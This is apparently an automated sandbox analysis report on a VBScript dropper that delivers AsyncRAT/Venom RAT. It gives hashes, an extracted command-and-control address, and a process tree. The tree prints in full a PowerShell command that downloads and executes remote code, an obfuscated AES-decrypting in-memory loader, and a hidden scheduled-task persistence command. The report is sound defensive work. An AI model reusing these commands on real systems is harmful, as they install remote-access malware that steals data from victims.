Analysis
-
max time kernel
94s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
18-12-2024 02:36
Static task
static1
Behavioral task
behavioral1
Sample
6096bee06cb4d3d603d6e200d9c4a81f80c1b0fb892fd05cb56c85d50e52c83d.vbs
Resource
win7-20240729-en
General
-
Target
6096bee06cb4d3d603d6e200d9c4a81f80c1b0fb892fd05cb56c85d50e52c83d.vbs
-
Size
66KB
-
MD5
db10d2a27be78c780e5757b46a265e6d
-
SHA1
36f720617c0f2eb5fd700dc06714fb069dea7eb9
-
SHA256
6096bee06cb4d3d603d6e200d9c4a81f80c1b0fb892fd05cb56c85d50e52c83d
-
SHA512
58e90ac9142a2221c24bf82eb24207097c2d1121c005db1533c646ce2ed461fc1318eab619a524930094711554436ca02de05a722d12cbad0cbed7da33f307c7
-
SSDEEP
1536:813BEKsxa+9hxSiZUq50BPW8TzigIMGX5TXx2ChW3/V79j8:/KMaYhciZtuFVVIMGJXx2P8
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Dec2024
45.88.88.7:6845
zmkdvkzgwmnzhgvxwwk
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/4416-65-0x000001CD26480000-0x000001CD26498000-memory.dmp family_asyncrat -
Blocklisted process makes network request 1 IoCs
flow pid Process 38 4416 powershell.exe -
pid Process 264 powershell.exe 3344 powershell.exe 4568 powershell.exe 4416 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 264 powershell.exe 264 powershell.exe 3344 powershell.exe 3344 powershell.exe 4568 powershell.exe 4568 powershell.exe 4416 powershell.exe 4416 powershell.exe 4416 powershell.exe 4416 powershell.exe 4416 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 264 powershell.exe Token: SeDebugPrivilege 3344 powershell.exe Token: SeDebugPrivilege 4568 powershell.exe Token: SeIncreaseQuotaPrivilege 4568 powershell.exe Token: SeSecurityPrivilege 4568 powershell.exe Token: SeTakeOwnershipPrivilege 4568 powershell.exe Token: SeLoadDriverPrivilege 4568 powershell.exe Token: SeSystemProfilePrivilege 4568 powershell.exe Token: SeSystemtimePrivilege 4568 powershell.exe Token: SeProfSingleProcessPrivilege 4568 powershell.exe Token: SeIncBasePriorityPrivilege 4568 powershell.exe Token: SeCreatePagefilePrivilege 4568 powershell.exe Token: SeBackupPrivilege 4568 powershell.exe Token: SeRestorePrivilege 4568 powershell.exe Token: SeShutdownPrivilege 4568 powershell.exe Token: SeDebugPrivilege 4568 powershell.exe Token: SeSystemEnvironmentPrivilege 4568 powershell.exe Token: SeRemoteShutdownPrivilege 4568 powershell.exe Token: SeUndockPrivilege 4568 powershell.exe Token: SeManageVolumePrivilege 4568 powershell.exe Token: 33 4568 powershell.exe Token: 34 4568 powershell.exe Token: 35 4568 powershell.exe Token: 36 4568 powershell.exe Token: SeIncreaseQuotaPrivilege 4568 powershell.exe Token: SeSecurityPrivilege 4568 powershell.exe Token: SeTakeOwnershipPrivilege 4568 powershell.exe Token: SeLoadDriverPrivilege 4568 powershell.exe Token: SeSystemProfilePrivilege 4568 powershell.exe Token: SeSystemtimePrivilege 4568 powershell.exe Token: SeProfSingleProcessPrivilege 4568 powershell.exe Token: SeIncBasePriorityPrivilege 4568 powershell.exe Token: SeCreatePagefilePrivilege 4568 powershell.exe Token: SeBackupPrivilege 4568 powershell.exe Token: SeRestorePrivilege 4568 powershell.exe Token: SeShutdownPrivilege 4568 powershell.exe Token: SeDebugPrivilege 4568 powershell.exe Token: SeSystemEnvironmentPrivilege 4568 powershell.exe Token: SeRemoteShutdownPrivilege 4568 powershell.exe Token: SeUndockPrivilege 4568 powershell.exe Token: SeManageVolumePrivilege 4568 powershell.exe Token: 33 4568 powershell.exe Token: 34 4568 powershell.exe Token: 35 4568 powershell.exe Token: 36 4568 powershell.exe Token: SeIncreaseQuotaPrivilege 4568 powershell.exe Token: SeSecurityPrivilege 4568 powershell.exe Token: SeTakeOwnershipPrivilege 4568 powershell.exe Token: SeLoadDriverPrivilege 4568 powershell.exe Token: SeSystemProfilePrivilege 4568 powershell.exe Token: SeSystemtimePrivilege 4568 powershell.exe Token: SeProfSingleProcessPrivilege 4568 powershell.exe Token: SeIncBasePriorityPrivilege 4568 powershell.exe Token: SeCreatePagefilePrivilege 4568 powershell.exe Token: SeBackupPrivilege 4568 powershell.exe Token: SeRestorePrivilege 4568 powershell.exe Token: SeShutdownPrivilege 4568 powershell.exe Token: SeDebugPrivilege 4568 powershell.exe Token: SeSystemEnvironmentPrivilege 4568 powershell.exe Token: SeRemoteShutdownPrivilege 4568 powershell.exe Token: SeUndockPrivilege 4568 powershell.exe Token: SeManageVolumePrivilege 4568 powershell.exe Token: 33 4568 powershell.exe Token: 34 4568 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4416 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 3084 wrote to memory of 2836 3084 WScript.exe 82 PID 3084 wrote to memory of 2836 3084 WScript.exe 82 PID 2836 wrote to memory of 264 2836 cmd.exe 84 PID 2836 wrote to memory of 264 2836 cmd.exe 84 PID 3084 wrote to memory of 1740 3084 WScript.exe 94 PID 3084 wrote to memory of 1740 3084 WScript.exe 94 PID 1740 wrote to memory of 3344 1740 cmd.exe 96 PID 1740 wrote to memory of 3344 1740 cmd.exe 96 PID 3344 wrote to memory of 4568 3344 powershell.exe 97 PID 3344 wrote to memory of 4568 3344 powershell.exe 97 PID 3344 wrote to memory of 1164 3344 powershell.exe 99 PID 3344 wrote to memory of 1164 3344 powershell.exe 99 PID 1164 wrote to memory of 4364 1164 WScript.exe 100 PID 1164 wrote to memory of 4364 1164 WScript.exe 100 PID 4364 wrote to memory of 4416 4364 cmd.exe 102 PID 4364 wrote to memory of 4416 4364 cmd.exe 102
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6096bee06cb4d3d603d6e200d9c4a81f80c1b0fb892fd05cb56c85d50e52c83d.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -NoExit -Command Invoke-Expresshiog(Infoke-WebRequest -Uri "https://emptyservices.vip/stub.txt" -UceBasingcorlijzationg = 'your_fixed_token_here' }).Content2⤵
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -NoExit -Command Invoke-Expresshiog(Infoke-WebRequest -Uri "https://emptyservices.vip/stub.txt" -UceBasingcorlijzationg = 'your_fixed_token_here' }).Content3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('byPitpttrKOr9S4gS51RiwODtTqtgx9LZXuwqMXWA4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KLxX3z6JPX89+JmQWr32sA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZBnGU=New-Object System.IO.MemoryStream(,$param_var); $vupQr=New-Object System.IO.MemoryStream; $leNdx=New-Object System.IO.Compression.GZipStream($ZBnGU, [IO.Compression.CompressionMode]::Decompress); $leNdx.CopyTo($vupQr); $leNdx.Dispose(); $ZBnGU.Dispose(); $vupQr.Dispose(); $vupQr.ToArray();}function execute_function($param_var,$param2_var){ $QBcFyzORlfFvkyN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eoxDpSmmlmQGNeDwSiumwcziYkJcAoZkRcmWGkOEDoRsISaNHINmPlrcPoEejkLWmFPLSHPHuQIhkgzfkVuSBNvFLjhsGKutDUgcdpVaSfSYDjSIOyToPTuzkjZIzxbJvpEpawcVauZwUwcBryDhQg=$QBcFyzORlfFvkyN.EntryPoint; $eoxDpSmmlmQGNeDwSiumwcziYkJcAoZkRcmWGkOEDoRsISaNHINmPlrcPoEejkLWmFPLSHPHuQIhkgzfkVuSBNvFLjhsGKutDUgcdpVaSfSYDjSIOyToPTuzkjZIzxbJvpEpawcVauZwUwcBryDhQg.Invoke($null, $param2_var);}$lH = 'C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $lH;$cAKjuebouz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lH).Split([Environment]::NewLine);foreach ($fH in $cAKjuebouz) { if ($fH.StartsWith('::')) { $S=$fH.Substring(2); break; }}$payloads_var=[string[]]$S.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'svchoststr14_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\inicia_str_14.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4568
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\inicia_str_14.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\inicia_str_14.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('byPitpttrKOr9S4gS51RiwODtTqtgx9LZXuwqMXWA4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KLxX3z6JPX89+JmQWr32sA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZBnGU=New-Object System.IO.MemoryStream(,$param_var); $vupQr=New-Object System.IO.MemoryStream; $leNdx=New-Object System.IO.Compression.GZipStream($ZBnGU, [IO.Compression.CompressionMode]::Decompress); $leNdx.CopyTo($vupQr); $leNdx.Dispose(); $ZBnGU.Dispose(); $vupQr.Dispose(); $vupQr.ToArray();}function execute_function($param_var,$param2_var){ $QBcFyzORlfFvkyN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eoxDpSmmlmQGNeDwSiumwcziYkJcAoZkRcmWGkOEDoRsISaNHINmPlrcPoEejkLWmFPLSHPHuQIhkgzfkVuSBNvFLjhsGKutDUgcdpVaSfSYDjSIOyToPTuzkjZIzxbJvpEpawcVauZwUwcBryDhQg=$QBcFyzORlfFvkyN.EntryPoint; $eoxDpSmmlmQGNeDwSiumwcziYkJcAoZkRcmWGkOEDoRsISaNHINmPlrcPoEejkLWmFPLSHPHuQIhkgzfkVuSBNvFLjhsGKutDUgcdpVaSfSYDjSIOyToPTuzkjZIzxbJvpEpawcVauZwUwcBryDhQg.Invoke($null, $param2_var);}$lH = 'C:\Users\Admin\AppData\Roaming\inicia_str_14.bat';$host.UI.RawUI.WindowTitle = $lH;$cAKjuebouz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lH).Split([Environment]::NewLine);foreach ($fH in $cAKjuebouz) { if ($fH.StartsWith('::')) { $S=$fH.Substring(2); break; }}$payloads_var=[string[]]$S.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4416
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
1KB
MD5ff2ebc63009127bf2c74f18dc727774e
SHA1603a245252097e9b8d6823e08a76361ba94f7720
SHA2565048a68ea6a51a2a93fba28d043dbcc8ae067225e4e1b9569a74caac617e9a42
SHA51215b4baf594f91eba3ad7d390859140220da191bfc9de2eeeca5455a643ce5b19cd88b221e354d6a577df799564cc73285f2418108d2b850630196053ac53007b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
62KB
MD5b318d9f0c62b86e1c78917fa43630e1f
SHA1e57533546987c2f91db873ab2b756bd752deafda
SHA2564b429c11db344779526f0cdacc411ec8835f2682d5212ad5f5b0c1d48020a028
SHA512b0417872bd1234e1ac2ecf80c14396ab92f177d54edeb1cc296b2f51af0138f3bfd11f2431f879ad59abfefb9fa83ec93e4c9ce8e14abd79cd1faf1c9217a75c
-
Filesize
113B
MD59ecc1797d1869533d6b8c20cd0c53cfc
SHA1a128856bc511b103d0599ba1ee135da1681e377f
SHA256aa54997a5f5d45a65bc44979d6709a516caec6a996d5a272899b7b62cfe38b83
SHA512dd017eea52567812f62e1575e1bfffb7e3b2b7b0384f83eb355f84801b81038b53ed82bcd9c64b4d8fe94b69934b1c01becd8e899ddf595d45a06f1f0c5106f4